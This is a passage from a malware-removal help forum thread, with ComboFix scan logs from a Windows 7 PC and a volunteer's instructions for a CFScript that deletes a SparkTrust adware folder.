S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 avast! Firewall;avast! Firewall;c:\program files\AVAST Software\Avast\afwServ.exe;c:\program files\AVAST Software\Avast\afwServ.exe [x]
S2 avgwd;AVG WatchDog;c:\program files (x86)\AVG\AVG2014\avgwdsvc.exe;c:\program files (x86)\AVG\AVG2014\avgwdsvc.exe [x]
S2 BBUpdate;BBUpdate;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 EPSON_EB_RPCV4_04;EPSON V5 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE [x]
S2 EPSON_PM_RPCV4_04;EPSON V3 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S3 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-03-19 22:03 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-24 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-02-06 21:17]
.
2014-03-24 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20 09:40]
.
2014-03-24 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20 09:40]
.
2014-01-20 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18 07:11]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2014-03-15 23:06 287280 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:57 444752 ----a-w- c:\windows\System32\mscoree.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/firefox
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=utf-8&q=
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{13070af0-bc6c-4185-8baa-40a4cf05b323} - (no file)
BHO-{497c088e-1b2a-43fe-8431-d5d257f37546} - (no file)
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Wow6432Node-HKU-Default-RunOnce-SPReview - c:\windows\System32\SPReview\SPReview.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10c.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-03-25  09:14:44
ComboFix-quarantined-files.txt  2014-03-24 23:14
.
Pre-Run: 652,611,481,600 bytes free
Post-Run: 652,166,672,384 bytes free
.
- - End Of File - - 328B06046D416BD74D516EF1ADB36626
B408478238977884445221DD3C0F0326
 



#11 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 25 March 2014 - 08:55 AM


Hello Paulie67

At this time I would like you to run this script for me and it is a good time to check out the computer to see if there is anything else that needs to be addressed.

:Run CFScript:

Please start by opening Notepad and copy/paste the text in the box into the window:

ClearJavaCache::

Folder::
c:\program files (x86)\Common Files\SparkTrust
 
Save it to your desktop as CFScript.txt

Referring to the picture above, drag CFScript.txt into ComboFix.exe
CFScriptB-4.gif
This will let ComboFix run again.
Restart if you have to.
Save the produced logfile to your desktop.

Note: Do not mouseclick combofix's window whilst it's running. That may cause it to stall

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." Please restart the computer

"information and logs"
  • In your next post I need the following
    • report from Combofix
    • let me know of any problems you may have had
    • How is the computer doing now after running the script?
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#12 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 26 March 2014 - 03:26 AM

ComboFix 14-03-24.01 - Paulette 26/03/2014 15:38:36.2.4 - x64
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.61.1033.18.2047.996 [GMT 10:00]
Running from: c:\users\Paulette\Desktop\ComboFix.exe
Command switches used :: c:\users\Paulette\Desktop\CFScript.txt
AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
FW: avast! Antivirus *Disabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\program files (x86)\Common Files\SparkTrust
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\ad_generic.jpg
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\close_pu_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\Logo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min_md.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\min_mo.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\progress_glow.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\Images\topbar_gradient.png
c:\program files (x86)\Common Files\SparkTrust\UUS3\LiteUnzip.dll
c:\program files (x86)\Common Files\SparkTrust\UUS3\settings.xml
c:\program files (x86)\Common Files\SparkTrust\UUS3\Update3.exe
c:\program files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll
.
.
((((((((((((((((((((((((( Files Created from 2014-02-26 to 2014-03-26 )))))))))))))))))))))))))))))))
.
.
2014-03-26 06:25 . 2014-03-26 06:25 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-03-26 06:25 . 2014-03-26 06:25 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-26 05:43 . 2014-03-26 05:43 75888 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{18BA5166-823F-4253-906A-07F23A0153F3}\offreg.dll
2014-03-18 14:41 . 2014-03-19 21:58 -------- d-----w- C:\FRST
2014-03-17 03:09 . 2014-03-17 03:09 -------- d-----w- c:\windows\ERUNT
2014-03-17 02:39 . 2014-03-20 00:20 -------- d-----w- C:\AdwCleaner
2014-03-16 05:22 . 2014-03-16 05:22 440672 ----a-w- c:\windows\system32\drivers\aswndisflt.sys
2014-03-16 05:19 . 2014-03-16 05:19 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVAST Software
2014-03-15 23:06 . 2014-03-15 23:06 80184 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-03-15 23:06 . 2014-03-15 23:06 207904 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-03-15 23:06 . 2014-03-15 23:06 65776 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-03-15 23:06 . 2014-03-15 23:06 421704 ----a-w- c:\windows\system32\drivers\aswSP.sys
2014-03-15 23:06 . 2014-03-15 23:06 1038072 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-03-15 23:06 . 2014-03-15 23:06 92544 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-03-15 23:06 . 2014-03-15 23:06 78648 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-03-15 23:06 . 2014-03-15 23:06 28184 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2014-03-15 23:06 . 2014-03-15 23:06 334136 ----a-w- c:\windows\system32\aswBoot.exe
2014-03-15 23:06 . 2014-03-15 23:06 43152 ----a-w- c:\windows\avastSS.scr
2014-03-15 23:05 . 2014-03-15 23:05 -------- d-----w- c:\program files\AVAST Software
2014-03-15 23:02 . 2014-03-15 23:02 -------- d-----w- c:\programdata\AVAST Software
2014-03-12 22:58 . 2014-02-04 02:32 624128 ----a-w- c:\windows\system32\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:04 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:32 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-03-12 22:58 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-03-09 23:02 . 2014-03-09 23:02 -------- d-----w- c:\users\Paulette\AppData\Roaming\Malwarebytes
2014-03-09 22:00 . 2014-03-10 03:20 -------- d-----w- c:\users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-09 03:27 . 2013-12-17 23:38 40248 ----a-w- c:\windows\system32\TURegOpt.exe
2014-03-09 03:27 . 2013-12-17 23:38 29496 ----a-w- c:\windows\system32\authuitu.dll
2014-03-09 03:27 . 2013-12-17 23:38 25400 ----a-w- c:\windows\SysWow64\authuitu.dll
2014-03-09 03:27 . 2014-03-09 03:27 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVG
2014-03-09 03:25 . 2014-03-09 03:29 -------- d-----w- c:\programdata\AVG
2014-03-09 03:25 . 2014-03-09 03:33 -------- d-sh--w- c:\programdata\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-02-28 00:28 . 2014-03-15 21:29 -------- d-----w- c:\program files (x86)\MediaViewV1
2014-02-24 23:17 . 2014-02-24 23:17 -------- d-----w- c:\program files (x86)\MediaViewerV1
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-19 10:46 . 2014-01-20 11:20 90015360 ----a-w- c:\windows\system32\MRT.exe
2014-03-12 21:17 . 2014-02-06 09:45 71048 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 21:17 . 2014-02-06 09:45 692616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-01-29 22:57 . 2014-01-29 22:57 194048 ----a-w- c:\windows\SysWow64\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 645120 ----a-w- c:\windows\SysWow64\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 235008 ----a-w- c:\windows\system32\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 71680 ----a-w- c:\windows\SysWow64\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 182272 ----a-w- c:\windows\SysWow64\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\SysWow64\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 34816 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 337408 ----a-w- c:\windows\SysWow64\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 24576 ----a-w- c:\windows\SysWow64\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 151552 ----a-w- c:\windows\SysWow64\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 139264 ----a-w- c:\windows\SysWow64\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 1051136 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 61952 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 36352 ----a-w- c:\windows\SysWow64\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\SysWow64\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\SysWow64\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 74240 ----a-w- c:\windows\SysWow64\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\SysWow64\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 111616 ----a-w- c:\windows\SysWow64\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 942592 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 247808 ----a-w- c:\windows\system32\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 90112 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 52224 ----a-w- c:\windows\system32\msfeedsbs.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\system32\msfeedssync.exe
2014-01-29 22:56 . 2014-01-29 22:56 131072 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 105984 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 77312 ----a-w- c:\windows\system32\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 40448 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 616104 ----a-w- c:\windows\system32\ieapfltr.dat
2014-01-29 22:56 . 2014-01-29 22:56 453120 ----a-w- c:\windows\system32\dxtmsft.dll
2014-01-29 22:56 . 2014-01-29 22:56 413696 ----a-w- c:\windows\system32\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 296960 ----a-w- c:\windows\system32\dxtrans.dll
2014-01-29 22:56 . 2014-01-29 22:56 81408 ----a-w- c:\windows\system32\icardie.dll
2014-01-29 22:56 . 2014-01-29 22:56 235520 ----a-w- c:\windows\system32\url.dll
2014-01-29 22:56 . 2014-01-29 22:56 1228800 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 263376 ----a-w- c:\windows\system32\iedkcs32.dll
2014-01-29 22:56 . 2014-01-29 22:56 84992 ----a-w- c:\windows\system32\mshtmled.dll
2014-01-29 22:56 . 2014-01-29 22:56 30208 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 243200 ----a-w- c:\windows\system32\webcheck.dll
2014-01-29 22:56 . 2014-01-29 22:56 101376 ----a-w- c:\windows\system32\inseng.dll
2014-01-29 22:56 . 2014-01-29 22:56 167424 ----a-w- c:\windows\system32\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 143872 ----a-w- c:\windows\system32\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\system32\pngfilt.dll
2014-01-29 22:56 . 2014-01-29 22:56 147968 ----a-w- c:\windows\system32\occache.dll
2014-01-29 22:56 . 2014-01-29 22:56 13824 ----a-w- c:\windows\system32\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 774144 ----a-w- c:\windows\system32\jscript.dll
2014-01-29 22:56 . 2014-01-29 22:56 83968 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 48128 ----a-w- c:\windows\system32\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 135680 ----a-w- c:\windows\system32\iepeers.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 522752 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 364544 ----a-w- c:\windows\SysWow64\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2776576 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2284544 ----a-w- c:\windows\SysWow64\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 1682432 ----a-w- c:\windows\system32\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 1158144 ----a-w- c:\windows\SysWow64\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 604160 ----a-w- c:\windows\SysWow64\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 363008 ----a-w- c:\windows\system32\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 249856 ----a-w- c:\windows\SysWow64\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 220160 ----a-w- c:\windows\SysWow64\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 207872 ----a-w- c:\windows\SysWow64\WindowsCodecsExt.dll
